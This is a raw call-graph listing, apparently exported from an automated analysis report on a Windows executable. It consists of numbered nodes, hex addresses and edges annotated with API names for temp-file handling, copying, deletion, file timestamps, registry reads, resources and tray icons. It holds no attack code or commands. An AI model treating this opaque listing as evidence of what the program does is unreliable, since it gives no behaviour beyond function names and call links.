18a961 22 API calls 97951->97952 97953 1ed836 97952->97953 97954 18525f 22 API calls 97953->97954 97955 1ed84d 97954->97955 97956 18525f 22 API calls 97955->97956 97957 1ed866 97956->97957 97958 184c6d 22 API calls 97957->97958 97959 1ed872 97958->97959 97960 1ed885 97959->97960 97961 1893b2 22 API calls 97959->97961 97962 184c6d 22 API calls 97960->97962 97961->97960 97963 1ed88e 97962->97963 97964 1ed89e 97963->97964 97965 1893b2 22 API calls 97963->97965 97966 1ed8b0 97964->97966 97968 18a8c7 22 API calls 97964->97968 97965->97964 97967 186350 22 API calls 97966->97967 97969 1ed8bb 97967->97969 97968->97966 98215 1ed978 22 API calls 97969->98215 97971 1ed8ca 98216 1ed978 22 API calls 97971->98216 97973 1ed8dd 97974 184c6d 22 API calls 97973->97974 97975 1ed8e7 97974->97975 97976 1ed8fe 97975->97976 97977 1ed8ec 97975->97977 97979 184c6d 22 API calls 97976->97979 97978 1833c6 22 API calls 97977->97978 97980 1ed8f9 97978->97980 97981 1ed907 97979->97981 97983 186350 22 API calls 97980->97983 97982 1ed925 97981->97982 97985 1833c6 22 API calls 97981->97985 97984 186350 22 API calls 97982->97984 97983->97982 97984->97986 97985->97980 97986->97394 97988 1f2954 __wsopen_s 97987->97988 97989 19fe0b 22 API calls 97988->97989 97990 1f2971 97989->97990 97991 185722 22 API calls 97990->97991 97992 1f297b 97991->97992 98217 1f274e 97992->98217 97994 1f2986 97995 18511f 64 API calls 97994->97995 97996 1f299b 97995->97996 97997 1f29bf 97996->97997 97998 1f2a6c 97996->97998 98233 1f2e66 75 API calls 97997->98233 98236 1f2e66 75 API calls 97998->98236 98001 1f29c4 98025 1f2a75 ISource 98001->98025 98234 1ad583 26 API calls 98001->98234 98002 1f2a38 98004 1850f5 40 API calls 98002->98004 98002->98025 98005 1f2a91 98004->98005 98006 1850f5 40 API calls 98005->98006 98007 1f2aa1 98006->98007 98009 1850f5 40 API calls 98007->98009 98008 1f29ed 98235 1ad583 26 API calls 98008->98235 98011 1f2abc 98009->98011 98012 1850f5 40 API calls 98011->98012 98013 1f2acc 98012->98013 98014 1850f5 40 API calls 98013->98014 98015 1f2ae7 98014->98015 98016 1850f5 40 API calls 98015->98016 98017 1f2af7 98016->98017 98018 1850f5 40 API calls 98017->98018 98019 1f2b07 98018->98019 98020 1850f5 40 API calls 98019->98020 98021 1f2b17 98020->98021 98220 1f3017 GetTempPathW GetTempFileNameW 98021->98220 98023 1f2b22 98024 1ae5eb 29 API calls 98023->98024 98036 1f2b33 98024->98036 98025->97401 98026 1f2bed 98027 1ae678 67 API calls 98026->98027 98028 1f2bf8 98027->98028 98030 1f2bfe DeleteFileW 98028->98030 98031 1f2c12 98028->98031 98029 1850f5 40 API calls 98029->98036 98030->98025 98032 1f2c91 CopyFileW 98031->98032 98038 1f2c18 98031->98038 98033 1f2cb9 DeleteFileW 98032->98033 98034 1f2ca7 DeleteFileW 98032->98034 98230 1f2fd8 CreateFileW 98033->98230 98034->98025 98036->98025 98036->98026 98036->98029 98221 1adbb3 98036->98221 98237 1f22ce 98038->98237 98041 1f2c80 DeleteFileW 98041->98025 98042->97328 98043->97362 98044->97374 98046 184ea8 GetProcAddress 98045->98046 98047 184ec6 98045->98047 98048 184eb8 98046->98048 98050 1ae5eb 98047->98050 98048->98047 98049 184ebf FreeLibrary 98048->98049 98049->98047 98081 1ae52a 98050->98081 98052 184eea 98052->97862 98052->97863 98054 184e8d 98053->98054 98055 184e6e GetProcAddress 98053->98055 98058 184f80 98054->98058 98056 184e7e 98055->98056 98056->98054 98057 184e86 FreeLibrary 98056->98057 98057->98054 98059 19fe0b 22 API calls 98058->98059 98060 184f95 98059->98060 98061 185722 22 API calls 98060->98061 98062 184fa1 __fread_nolock 98061->98062 98063 1c3d1d 98062->98063 98064 1850a5 98062->98064 98074 184fdc 98062->98074 98144 1f304d 74 API calls 98063->98144 98133 1842a2 CreateStreamOnHGlobal 98064->98133 98067 1c3d22 98069 18511f 64 API calls 98067->98069 98068 1850f5 40 API calls 98068->98074 98070 1c3d45 98069->98070 98071 1850f5 40 API calls 98070->98071 98072 18506e ISource 98071->98072 98072->97871 98074->98067 98074->98068 98074->98072 98139 18511f 98074->98139 98076 185107 98075->98076 98079 1c3d70 98075->98079 98166 1ae8c4 98076->98166 98080 1f28fe 27 API calls 98080->97878 98082 1ae536 ___scrt_is_nonwritable_in_current_image 98081->98082 98083 1ae544 98082->98083 98085 1ae574 98082->98085 98106 1af2d9 20 API calls __dosmaperr 98083->98106 98087 1ae579 98085->98087 98088 1ae586 98085->98088 98086 1ae549 98107 1b27ec 26 API calls __fread_nolock 98086->98107 98108 1af2d9 20 API calls __dosmaperr 98087->98108 98098 1b8061 98088->98098 98092 1ae58f 98093 1ae5a2 98092->98093 98094 1ae595 98092->98094 98110 1ae5d4 LeaveCriticalSection __fread_nolock 98093->98110 98109 1af2d9 20 API calls __dosmaperr 98094->98109 98095 1ae554 __fread_nolock 98095->98052 98099 1b806d ___scrt_is_nonwritable_in_current_image 98098->98099 98111 1b2f5e EnterCriticalSection 98099->98111 98101 1b807b 98112 1b80fb 98101->98112 98105 1b80ac __fread_nolock 98105->98092 98106->98086 98107->98095 98108->98095 98109->98095 98110->98095 98111->98101 98118 1b811e 98112->98118 98113 1b8177 98114 1b4c7d __dosmaperr 20 API calls 98113->98114 98115 1b8180 98114->98115 98117 1b29c8 _free 20 API calls 98115->98117 98119 1b8189 98117->98119 98118->98113 98118->98118 98124 1b8088 98118->98124 98128 1a918d EnterCriticalSection 98118->98128 98129 1a91a1 LeaveCriticalSection 98118->98129 98119->98124 98130 1b3405 11 API calls 2 library calls 98119->98130 98121 1b81a8 98131 1a918d EnterCriticalSection 98121->98131 98125 1b80b7 98124->98125 98132 1b2fa6 LeaveCriticalSection 98125->98132 98127 1b80be 98127->98105 98128->98118 98129->98118 98130->98121 98131->98124 98132->98127 98134 1842bc FindResourceExW 98133->98134 98138 1842d9 98133->98138 98135 1c35ba LoadResource 98134->98135 98134->98138 98136 1c35cf SizeofResource 98135->98136 98135->98138 98137 1c35e3 LockResource 98136->98137 98136->98138 98137->98138 98138->98074 98140 18512e 98139->98140 98141 1c3d90 98139->98141 98145 1aece3 98140->98145 98144->98067 98148 1aeaaa 98145->98148 98147 18513c 98147->98074 98152 1aeab6 ___scrt_is_nonwritable_in_current_image 98148->98152 98149 1aeac2 98161 1af2d9 20 API calls __dosmaperr 98149->98161 98151 1aeae8 98163 1a918d EnterCriticalSection 98151->98163 98152->98149 98152->98151 98153 1aeac7 98162 1b27ec 26 API calls __fread_nolock 98153->98162 98156 1aeaf4 98164 1aec0a 62 API calls 2 library calls 98156->98164 98158 1aeb08 98165 1aeb27 LeaveCriticalSection __fread_nolock 98158->98165 98160 1aead2 __fread_nolock 98160->98147 98161->98153 98162->98160 98163->98156 98164->98158 98165->98160 98169 1ae8e1 98166->98169 98168 185118 98168->98080 98170 1ae8ed ___scrt_is_nonwritable_in_current_image 98169->98170 98171 1ae92d 98170->98171 98172 1ae900 ___scrt_fastfail 98170->98172 98173 1ae925 __fread_nolock 98170->98173 98182 1a918d EnterCriticalSection 98171->98182 98196 1af2d9 20 API calls __dosmaperr 98172->98196 98173->98168 98175 1ae937 98183 1ae6f8 98175->98183 98178 1ae91a 98197 1b27ec 26 API calls __fread_nolock 98178->98197 98182->98175 98187 1ae70a ___scrt_fastfail 98183->98187 98189 1ae727 98183->98189 98184 1ae717 98199 1af2d9 20 API calls __dosmaperr 98184->98199 98186 1ae71c 98200 1b27ec 26 API calls __fread_nolock 98186->98200 98187->98184 98187->98189 98194 1ae76a __fread_nolock 98187->98194 98198 1ae96c LeaveCriticalSection __fread_nolock 98189->98198 98190 1ae886 ___scrt_fastfail 98202 1af2d9 20 API calls __dosmaperr 98190->98202 98193 1ad955 __fread_nolock 26 API calls 98193->98194 98194->98189 98194->98190 98194->98193 98195 1b8d45 __fread_nolock 38 API calls 98194->98195 98201 1acf78 26 API calls 3 library calls 98194->98201 98195->98194 98196->98178 98197->98173 98198->98173 98199->98186 98200->98189 98201->98194 98202->98186 98203->97917 98205 1863b6 __fread_nolock 98204->98205 98206 186382 98204->98206 98205->97929 98206->98205 98207 1c4a82 98206->98207 98208 1863a9 98206->98208 98209 19fddb 22 API calls 98207->98209 98210 18a587 22 API calls 98208->98210 98211 1c4a91 98209->98211 98210->98205 98212 19fe0b 22 API calls 98211->98212 98213 1c4ac5 __fread_nolock 98212->98213 98214->97930 98215->97971 98216->97973 98266 1ae4e8 98217->98266 98219 1f275d 98219->97994 98220->98023 98222 1adbdd 98221->98222 98223 1adbc1 98221->98223 98222->98036 98223->98222 98224 1adbcd 98223->98224 98225 1adbe3 98223->98225 98283 1af2d9 20 API calls __dosmaperr 98224->98283 98280 1ad9cc 98225->98280 98228 1adbd2 98284 1b27ec 26 API calls __fread_nolock 98228->98284 98231 1f2fff SetFileTime CloseHandle 98230->98231 98232 1f3013 98230->98232 98231->98232 98232->98025 98233->98001 98234->98008 98235->98002 98236->98002 98238 1f22d9 98237->98238 98239 1f22e7 98237->98239 98240 1ae5eb 29 API calls 98238->98240 98241 1f232c 98239->98241 98242 1ae5eb 29 API calls 98239->98242 98265 1f22f0 98239->98265 98240->98239 98326 1f2557 98241->98326 98244 1f2311 98242->98244 98244->98241 98246 1f231a 98244->98246 98245 1f2370 98247 1f2395 98245->98247 98248 1f2374 98245->98248 98249 1ae678 67 API calls 98246->98249 98246->98265 98330 1f2171 98247->98330 98251 1f2381 98248->98251 98253 1ae678 67 API calls 98248->98253 98249->98265 98256 1ae678 67 API calls 98251->98256 98251->98265 98252 1f239d 98254 1f23c3 98252->98254 98255 1f23a3 98252->98255 98253->98251 98337 1f23f3 98254->98337 98257 1f23b0 98255->98257 98259 1ae678 67 API calls 98255->98259 98256->98265 98260 1ae678 67 API calls 98257->98260 98257->98265 98259->98257 98260->98265 98261 1f23de 98261->98265 98262 1f23ca 98262->98261 98263 1ae678 67 API calls 98262->98263 98263->98261 98265->98033 98265->98041 98269 1ae469 98266->98269 98268 1ae505 98268->98219 98270 1ae478 98269->98270 98272 1ae48c 98269->98272 98277 1af2d9 20 API calls __dosmaperr 98270->98277 98275 1ae488 __alldvrm 98272->98275 98279 1b333f 11 API calls 2 library calls 98272->98279 98274 1ae47d 98278 1b27ec 26 API calls __fread_nolock 98274->98278 98275->98268 98277->98274 98278->98275 98279->98275 98285 1ad97b 98280->98285 98282 1ad9f0 98282->98222 98283->98228 98284->98222 98286 1ad987 ___scrt_is_nonwritable_in_current_image 98285->98286 98293 1a918d EnterCriticalSection 98286->98293 98288 1ad995 98294 1ad9f4 98288->98294 98292 1ad9b3 __fread_nolock 98292->98282 98293->98288 98302 1b49a1 98294->98302 98300 1ad9a2 98301 1ad9c0 LeaveCriticalSection __fread_nolock 98300->98301 98301->98292 98303 1ad955 __fread_nolock 26 API calls 98302->98303 98304 1b49b0 98303->98304 98305 1bf89b __fread_nolock 26 API calls 98304->98305 98306 1b49b6 98305->98306 98310 1ada09 98306->98310 98323 1b3820 21 API calls __dosmaperr 98306->98323 98308 1b4a15 98309 1b29c8 _free 20 API calls 98308->98309 98309->98310 98311 1ada3a 98310->98311 98312 1ada4c 98311->98312 98317 1ada24 98311->98317 98313 1ada5a 98312->98313 98312->98317 98321 1ada85 __fread_nolock 98312->98321 98324 1af2d9 20 API calls __dosmaperr 98313->98324 98315 1ada5f 98325 1b27ec 26 API calls __fread_nolock 98315->98325 98322 1b4a56 62 API calls 98317->98322 98318 1adc0b 62 API calls 98318->98321 98319 1ad955 __fread_nolock 26 API calls 98319->98321 98320 1b59be __wsopen_s 62 API calls 98320->98321 98321->98317 98321->98318 98321->98319 98321->98320 98322->98300 98323->98308 98324->98315 98325->98317 98327 1f257c 98326->98327 98329 1f2565 __fread_nolock 98326->98329 98328 1ae8c4 __fread_nolock 40 API calls 98327->98328 98328->98329 98329->98245 98331 1aea0c ___std_exception_copy 21 API calls 98330->98331 98332 1f217f 98331->98332 98333 1aea0c ___std_exception_copy 21 API calls 98332->98333 98334 1f2190 98333->98334 98335 1aea0c ___std_exception_copy 21 API calls 98334->98335 98336 1f219c 98335->98336 98336->98252 98344 1f2408 98337->98344 98338 1f24c0 98349 1f2724 98338->98349 98339 1f21cc 40 API calls 98339->98344 98341 1f24c7 98341->98262 98344->98338 98344->98339 98344->98341 98345 1f2606 98344->98345 98353 1f2269 40 API calls 98344->98353 98346 1f2617 98345->98346 98348 1f261d 98345->98348 98346->98348 98354 1f26d7 98346->98354 98348->98344 98350 1f2742 98349->98350 98351 1f2731 98349->98351 98350->98341 98353->98344 98355 1f2703 98354->98355 98358->97404 98359->97404 98360->97425 98361->97425 98362->97423 98363->97425 98364->97279 98365 1d3f75 98376 19ceb1 98365->98376 98367 1d3f8b 98368 1d4006 98367->98368 98443 19e300 23 API calls 98367->98443 98385 18bf40 98368->98385 98370 1d3fe6 98373 1d4052 98370->98373 98444 1f1abf 22 API calls 98370->98444 98375 1d4a88 98373->98375 98445 1f359c 82 API calls __wsopen_s 98373->98445 98377 19cebf 98376->98377 98378 19ced2 98376->98378 98379 18aceb 23 API calls 98377->98379 98380 19cf05 98378->98380 98381 19ced7 98378->98381 98384 19cec9 98379->98384 98383 18aceb 23 API calls 98380->98383 98382 19fddb 22 API calls 98381->98382 98382->98384 98383->98384 98384->98367 98446 18adf0 98385->98446 98387 18bf9d 98388 18bfa9 98387->98388 98389 1d04b6 98387->98389 98391 1d04c6 98388->98391 98392 18c01e 98388->98392 98474 1f359c 82 API calls __wsopen_s 98389->98474 98475 1f359c 82 API calls __wsopen_s 98391->98475 98451 18ac91 98392->98451 98395 1d09bf 98442 18c603 98395->98442 98487 1f359c 82 API calls __wsopen_s 98395->98487 98396 18c7da 98401 19fe0b 22 API calls 98396->98401 98398 1e7120 22 API calls 98427 18c039 ISource __fread_nolock 98398->98427 98411 18c808 __fread_nolock 98401->98411 98404 1d04f5 98407 1d055a 98404->98407 98476 19d217 235 API calls 98404->98476 98406 18ec40 235 API calls 98406->98427 98407->98442 98477 1f359c 82 API calls __wsopen_s 98407->98477 98408 1d091a 98486 1f3209 23 API calls 98408->98486 98409 19fe0b 22 API calls 98432 18c350 ISource __fread_nolock 98409->98432 98410 18af8a 22 API calls 98410->98427 98411->98409 98414 1d08a5 98415 18ec40 235 API calls 98414->98415 98417 1d08cf 98415->98417 98417->98442 98484 18a81b 41 API calls 98417->98484 98418 1d0591 98478 1f359c 82 API calls __wsopen_s 98418->98478 98419 1d08f6 98485 1f359c 82 API calls __wsopen_s 98419->98485 98424 18c3ac 98424->98373 98425 18aceb 23 API calls 98425->98427 98426 18c237 98428 18c253 98426->98428 98430 18a8c7 22 API calls 98426->98430 98427->98395 98427->98396 98427->98398 98427->98404 98427->98406 98427->98407 98427->98408 98427->98410 98427->98411 98427->98414 98427->98418 98427->98419 98427->98425 98427->98426 98429 19fe0b 22 API calls 98427->98429 98435 19fddb 22 API calls 98427->98435 98439 18bbe0 40 API calls 98427->98439 98427->98442 98455 18ad81 98427->98455 98479 1e7099 22 API calls __fread_nolock 98427->98479 98480 205745 54 API calls _wcslen 98427->98480 98481 19aa42 22 API calls ISource 98427->98481 98482 1ef05c 40 API calls 98427->98482 98483 18a993 41 API calls 98427->98483 98431 1d0976 98428->98431 98436 18c297 ISource 98428->98436 98429->98427 98430->98428 98434 18aceb 23 API calls 98431->98434 98432->98424 98473 19ce17 22 API calls ISource 98432->98473 98434->98395 98435->98427 98436->98395 98437 18aceb 23 API calls 98436->98437 98438 18c335 98437->98438 98438->98395 98440 18c342 98438->98440 98439->98427 98462 18a704 98440->98462 98442->98373 98443->98370 98444->98368 98445->98375 98447 18ae01 98446->98447 98450 18ae1c ISource 98446->98450 98448 18aec9 22 API calls 98447->98448 98449 18ae09 CharUpperBuffW 98448->98449 98449->98450 98450->98387 98452 18acae 98451->98452 98453 18acd1 98452->98453 98488 1f359c 82 API calls __wsopen_s 98452->98488 98453->98427 98456 1cfadb 98455->98456 98457 18ad92 98455->98457 98458 19fddb 22 API calls 98457->98458 98459 18ad99 98458->98459 98489 18adcd 98459->98489 98463 1cf86f 98462->98463 98466 18a718 98462->98466 98464 1cf87f 98463->98464 98508 1e4d4a 22 API calls ISource 98463->98508 98467 18a746 98466->98467 98472 18a763 ISource 98466->98472 98496 18af8a 98466->98496 98469 18a74c 98467->98469 98470 18af8a 22 API calls 98467->98470 98469->98472 98504 18b090 98469->98504 98470->98469 98472->98432 98473->98432 98474->98391 98475->98442 98476->98407 98477->98442 98478->98442 98479->98427 98480->98427 98481->98427 98482->98427 98483->98427 98484->98419 98485->98442 98486->98426 98487->98442 98488->98453 98495 18addd 98489->98495 98490 18adb6 98490->98427 98491 19fddb 22 API calls 98491->98495 98492 18a961 22 API calls 98492->98495 98493 18a8c7 22 API calls 98493->98495 98494 18adcd 22 API calls 98494->98495 98495->98490 98495->98491 98495->98492 98495->98493 98495->98494 98497 18af98 98496->98497 98503 18afc0 ISource 98496->98503 98498 18af8a 22 API calls 98497->98498 98499 18afa6 98497->98499 98498->98499 98500 18afac 98499->98500 98501 18af8a 22 API calls 98499->98501 98502 18b090 22 API calls 98500->98502 98500->98503 98501->98500 98502->98503 98503->98467 98506 18b09b ISource 98504->98506 98505 18b0d6 ISource 98505->98472 98506->98505 98509 19ce17 22 API calls ISource 98506->98509 98508->98464 98509->98505 98510 181033 98515 184c91 98510->98515 98514 181042 98516 18a961 22 API calls 98515->98516 98517 184cff 98516->98517 98523 183af0 98517->98523 98520 184d9c 98521 181038 98520->98521 98526 1851f7 22 API calls __fread_nolock 98520->98526 98522 1a00a3 29 API calls __onexit 98521->98522 98522->98514 98527 183b1c 98523->98527 98526->98520 98528 183b0f 98527->98528 98529 183b29 98527->98529 98528->98520 98529->98528 98530 183b30 RegOpenKeyExW 98529->98530 98530->98528 98531 183b4a RegQueryValueExW 98530->98531 98532 183b6b 98531->98532 98533 183b80 RegCloseKey 98531->98533 98532->98533 98533->98528 98534 183156 98537 183170 98534->98537 98538 183187 98537->98538 98539 1831eb 98538->98539 98540 18318c 98538->98540 98541 1831e9 98538->98541 98542 1c2dfb 98539->98542 98543 1831f1 98539->98543 98544 183199 98540->98544 98545 183265 PostQuitMessage 98540->98545 98546 1831d0 DefWindowProcW 98541->98546 98593 1818e2 10 API calls 98542->98593 98547 1831f8 98543->98547 98548 18321d SetTimer RegisterWindowMessageW 98543->98548 98550 1c2e7c 98544->98550 98551 1831a4 98544->98551 98552 18316a 98545->98552 98546->98552 98553 1c2d9c 98547->98553 98554 183201 KillTimer 98547->98554 98548->98552 98556 183246 CreatePopupMenu 98548->98556 98598 1ebf30 34 API calls ___scrt_fastfail 98550->98598 98557 1c2e68 98551->98557 98558 1831ae 98551->98558 98566 1c2dd7 MoveWindow 98553->98566 98567 1c2da1 98553->98567 98589 1830f2 Shell_NotifyIconW ___scrt_fastfail 98554->98589 98555 1c2e1c 98594 19e499 42 API calls 98555->98594 98556->98552 98582 1ec161 98557->98582 98563 1c2e4d 98558->98563 98564 1831b9 98558->98564 98563->98546 98597 1e0ad7 22 API calls 98563->98597 98569 1831c4 98564->98569 98570 183253 98564->98570 98565 1c2e8e 98565->98546 98565->98552 98566->98552 98571 1c2dc6 SetFocus 98567->98571 98572 1c2da7 98567->98572 98568 183214 98590 183c50 DeleteObject DestroyWindow 98568->98590 98569->98546 98595 1830f2 Shell_NotifyIconW ___scrt_fastfail 98569->98595 98591 18326f 44 API calls ___scrt_fastfail 98570->98591 98571->98552 98572->98569 98573 1c2db0 98572->98573 98592 1818e2 10 API calls 98573->98592 98578 183263 98578->98552 98580 1c2e41 98596 183837 49 API calls ___scrt_fastfail 98580->98596 98583 1ec179 ___scrt_fastfail 98582->98583 98584 1ec276 98582->98584 98599 183923 98583->98599 98584->98552 98586 1ec25f KillTimer SetTimer 98586->98584 98587 1ec1a0 98587->98586 98588 1ec251 Shell_NotifyIconW 98587->98588 98588->98586 98589->98568 98590->98552 98591->98578 98592->98552 98593->98555 98594->98569 98595->98580 98596->98541 98597->98541 98598->98565 98600 18393f 98599->98600 98601 183a13 98599->98601 98602 186270 22 API calls 98600->98602 98601->98587 98603 18394d 98602->98603 98604 18395a 98603->98604 98605 1c3393 LoadStringW 98603->98605 98606 186b57 22 API calls 98604->98606 98607 1c33ad 98605->98607 98608 18396f 98606->98608 98611 18a8c7 22 API calls 98607->98611 98615 183994 ___scrt_fastfail 98607->98615 98609 18397c 98608->98609 98610 1c33c9 98608->98610 98609->98607 98612 183986 98609->98612 98613 186350 22 API calls 98610->98613 98611->98615 98614 186350 22 API calls 98612->98614 98616 1c33d7 98613->98616 98614->98615 98618 1839f9 Shell_NotifyIconW 98615->98618 98616->98615 98617 1833c6 22 API calls 98616->98617 98619 1c33f9 98617->98619 98618->98601 98620 1833c6 22 API calls 98619->98620 98620->98615 98621 182e37 98622 18a961 22 API calls 98621->98622 98623 182e4d 98622->98623 98700 184ae3 98623->98700 98625 182e6b 98626 183a5a 24 API calls 98625->98626 98627 182e7f 98626->98627 98628 189cb3 22 API calls 98627->98628 98629 182e8c 98628->98629 98630 184ecb 94 API calls 98629->98630 98631 182ea5 98630->98631 98632 182ead 98631->98632 98633 1c2cb0 98631->98633 98636 18a8c7 22 API calls 98632->98636 98730 1f2cf9 98633->98730 98635 1c2cc3 98637 1c2ccf 98635->98637 98638 184f39 68 API calls 98635->98638 98639 182ec3 98636->98639 98641 184f39 68 API calls 98637->98641 98638->98637 98714 186f88 22 API calls 98639->98714 98643 1c2ce5 98641->98643 98642 182ecf 98644 189cb3 22 API calls 98642->98644 98756 183084 22 API calls 98643->98756 98645 182edc 98644->98645 98715 18a81b 41 API calls 98645->98715 98648 182eec 98650 189cb3 22 API calls 98648->98650 98649 1c2d02 98757 183084 22 API calls 98649->98757 98651 182f12 98650->98651 98716 18a81b 41 API calls 98651->98716 98654 1c2d1e 98655 183a5a 24 API calls 98654->98655 98656 1c2d44 98655->98656 98758 183084 22 API calls 98656->98758 98657 182f21 98660 18a961 22 API calls 98657->98660 98659 1c2d50 98661 18a8c7 22 API calls 98659->98661 98662 182f3f 98660->98662 98663 1c2d5e 98661->98663 98717 183084 22 API calls 98662->98717 98759 183084 22 API calls 98663->98759 98666 182f4b 98718 1a4a28 40 API calls 3 library calls 98666->98718 98667 1c2d6d 98672 18a8c7 22 API calls 98667->98672 98669 182f59 98669->98643 98670 182f63 98669->98670 98719 1a4a28 40 API calls 3 library calls 98670->98719 98674 1c2d83 98672->98674 98673 182f6e 98673->98649 98675 182f78 98673->98675 98760 183084 22 API calls 98674->98760 98720 1a4a28 40 API calls 3 library calls 98675->98720 98678 1c2d90 98679 182f83 98679->98654 98680 182f8d 98679->98680 98721 1a4a28 40 API calls 3 library calls 98680->98721 98682 182f98 98683 182fdc 98682->98683 98722 183084 22 API calls 98682->98722 98683->98667 98684 182fe8 98683->98684 98684->98678 98724 1863eb 22 API calls 98684->98724 98687 182fbf 98689 18a8c7 22 API calls 98687->98689 98688 182ff8 98725 186a50 22 API calls 98688->98725 98691 182fcd 98689->98691 98723 183084 22 API calls 98691->98723 98693 183006 98726 1870b0 23 API calls 98693->98726 98695 183021 98698 183065 98695->98698 98727 186f88 22 API calls 98695->98727 98728 1870b0 23 API calls 98695->98728 98729 183084 22 API calls 98695->98729 98701 184af0 __wsopen_s 98700->98701 98702 186b57 22 API calls 98701->98702 98703 184b22 98701->98703 98702->98703 98704 184c6d 22 API calls 98703->98704 98706 184b58 98703->98706 98704->98703 98705 184c29 98707 189cb3 22 API calls 98705->98707 98710 184c5e 98705->98710 98706->98705 98708 189cb3 22 API calls 98706->98708 98711 184c6d 22 API calls 98706->98711 98713 18515f 22 API calls 98706->98713 98709 184c52 98707->98709 98708->98706 98712 18515f 22 API calls 98709->98712 98710->98625 98711->98706 98712->98710 98713->98706 98714->98642 98715->98648 98716->98657 98717->98666 98718->98669 98719->98673 98720->98679 98721->98682 98722->98687 98723->98683 98724->98688 98725->98693 98726->98695 98727->98695 98728->98695 98729->98695 98731 1f2d15 98730->98731 98732 18511f 64 API calls 98731->98732 98733 1f2d29 98732->98733 98761 1f2e66 75 API calls 98733->98761 98735 1f2d3b 98736 1850f5 40 API calls 98735->98736 98753 1f2d3f 98735->98753 98737 1f2d56 98736->98737 98738 1850f5 40 API calls 98737->98738 98739 1f2d66 98738->98739 98740 1850f5 40 API calls 98739->98740 98741 1f2d81 98740->98741 98742 1850f5 40 API calls 98741->98742 98743 1f2d9c 98742->98743 98744 18511f 64 API calls 98743->98744 98745 1f2db3 98744->98745 98746 1aea0c ___std_exception_copy 21 API calls 98745->98746 98747 1f2dba 98746->98747 98748 1aea0c ___std_exception_copy 21 API calls 98747->98748 98749 1f2dc4 98748->98749 98750 1850f5 40 API calls 98749->98750 98751 1f2dd8 98750->98751 98762 1f28fe 27 API calls 98751->98762 98753->98635 98754 1f2dee 98754->98753 98755 1f22ce 79 API calls 98754->98755 98755->98753 98756->98649 98757->98654 98758->98659 98759->98667 98760->98678 98761->98735 98762->98754 98763 181cad SystemParametersInfoW 98764 1b8402 98769 1b81be 98764->98769 98767 1b842a 98770 1b81ef try_get_first_available_module 98769->98770 98777 1b8338 98770->98777 98784 1a8e0b 40 API calls 2 library calls 98770->98784 98772 1b83ee 98788 1b27ec 26 API calls __fread_nolock 98772->98788 98774 1b8343 98774->98767 98781 1c0984 98774->98781 98776 1b838c 98776->98777 98785 1a8e0b 40 API calls 2 library calls 98776->98785 98777->98774 98787 1af2d9 20 API calls __dosmaperr 98777->98787 98779 1b83ab 98779->98777 98786 1a8e0b 40 API calls 2 library calls 98779->98786 98789 1c0081 98781->98789 98783 1c099f 98783->98767 98784->98776 98785->98779 98786->98777 98787->98772 98788->98774 98790 1c008d ___scrt_is_nonwritable_in_current_image 98789->98790 98791 1c009b 98790->98791 98793 1c00d4 98790->98793 98847 1af2d9 20 API calls __dosmaperr 98791->98847 98800 1c065b 98793->98800 98794 1c00a0 98848 1b27ec 26 API calls __fread_nolock 98794->98848 98799 1c00aa __fread_nolock 98799->98783 98850 1c042f 98800->98850 98803 1c068d 98882 1af2c6 20 API calls __dosmaperr 98803->98882 98804 1c06a6 98868 1b5221 98804->98868 98807 1c0692 98883 1af2d9 20 API calls __dosmaperr 98807->98883 98808 1c06ab 98809 1c06cb 98808->98809 98810 1c06b4 98808->98810 98881 1c039a CreateFileW 98809->98881 98884 1af2c6 20 API calls __dosmaperr 98810->98884 98814 1c06b9 98885 1af2d9 20 API calls __dosmaperr 98814->98885 98816 1c0781 GetFileType 98817 1c078c GetLastError 98816->98817 98818 1c07d3 98816->98818 98888 1af2a3 20 API calls __dosmaperr 98817->98888 98890 1b516a 21 API calls 2 library calls 98818->98890 98819 1c0756 GetLastError 98887 1af2a3 20 API calls __dosmaperr 98819->98887 98821 1c0704 98821->98816 98821->98819 98886 1c039a CreateFileW 98821->98886 98823 1c079a CloseHandle 98823->98807 98825 1c07c3 98823->98825 98889 1af2d9 20 API calls __dosmaperr 98825->98889 98827 1c0749 98827->98816 98827->98819 98829 1c07f4 98833 1c0840 98829->98833 98891 1c05ab 72 API calls 3 library calls 98829->98891 98830 1c07c8 98830->98807 98835 1c086d 98833->98835 98892 1c014d 72 API calls 4 library calls 98833->98892 98834 1c0866 98834->98835 98836 1c087e 98834->98836 98837 1b86ae __wsopen_s 29 API calls 98835->98837 98838 1c00f8 98836->98838 98839 1c08fc CloseHandle 98836->98839 98837->98838 98849 1c0121 LeaveCriticalSection __wsopen_s 98838->98849 98893 1c039a CreateFileW 98839->98893 98841 1c0927 98842 1c0931 GetLastError 98841->98842 98843 1c095d 98841->98843 98894 1af2a3 20 API calls __dosmaperr 98842->98894 98843->98838 98845 1c093d 98895 1b5333 21 API calls 2 library calls 98845->98895 98847->98794 98848->98799 98849->98799 98851 1c046a 98850->98851 98852 1c0450 98850->98852 98896 1c03bf 98851->98896 98852->98851 98903 1af2d9 20 API calls __dosmaperr 98852->98903 98855 1c045f 98904 1b27ec 26 API calls __fread_nolock 98855->98904 98857 1c04a2 98858 1c04d1 98857->98858 98905 1af2d9 20 API calls __dosmaperr 98857->98905 98867 1c0524 98858->98867 98907 1ad70d 26 API calls 2 library calls 98858->98907 98861 1c051f 98863 1c059e 98861->98863 98861->98867 98862 1c04c6 98906 1b27ec 26 API calls __fread_nolock 98862->98906 98908 1b27fc 11 API calls _abort 98863->98908 98866 1c05aa 98867->98803 98867->98804 98869 1b522d ___scrt_is_nonwritable_in_current_image 98868->98869 98911 1b2f5e EnterCriticalSection 98869->98911 98871 1b527b 98912 1b532a 98871->98912 98872 1b5259 98875 1b5000 __wsopen_s 21 API calls 98872->98875 98873 1b5234 98873->98871 98873->98872 98878 1b52c7 EnterCriticalSection 98873->98878 98877 1b525e 98875->98877 98876 1b52a4 __fread_nolock 98876->98808 98877->98871 98915 1b5147 EnterCriticalSection 98877->98915 98878->98871 98879 1b52d4 LeaveCriticalSection 98878->98879 98879->98873 98881->98821 98882->98807 98883->98838 98884->98814 98885->98807 98886->98827 98887->98807 98888->98823 98889->98830 98890->98829 98891->98833 98892->98834 98893->98841 98894->98845 98895->98843 98899 1c03d7 98896->98899 98897 1c03f2 98897->98857 98899->98897 98909 1af2d9 20 API calls __dosmaperr 98899->98909 98900 1c0416 98910 1b27ec 26 API calls __fread_nolock 98900->98910 98902 1c0421 98902->98857 98903->98855 98904->98851 98905->98862 98906->98858 98907->98861 98908->98866 98909->98900 98910->98902 98911->98873 98916 1b2fa6 LeaveCriticalSection 98912->98916 98914 1b5331 98914->98876 98915->98871 98916->98914 98917 1c2ba5 98918 1c2baf 98917->98918 98919 182b25 98917->98919 98921 183a5a 24 API calls 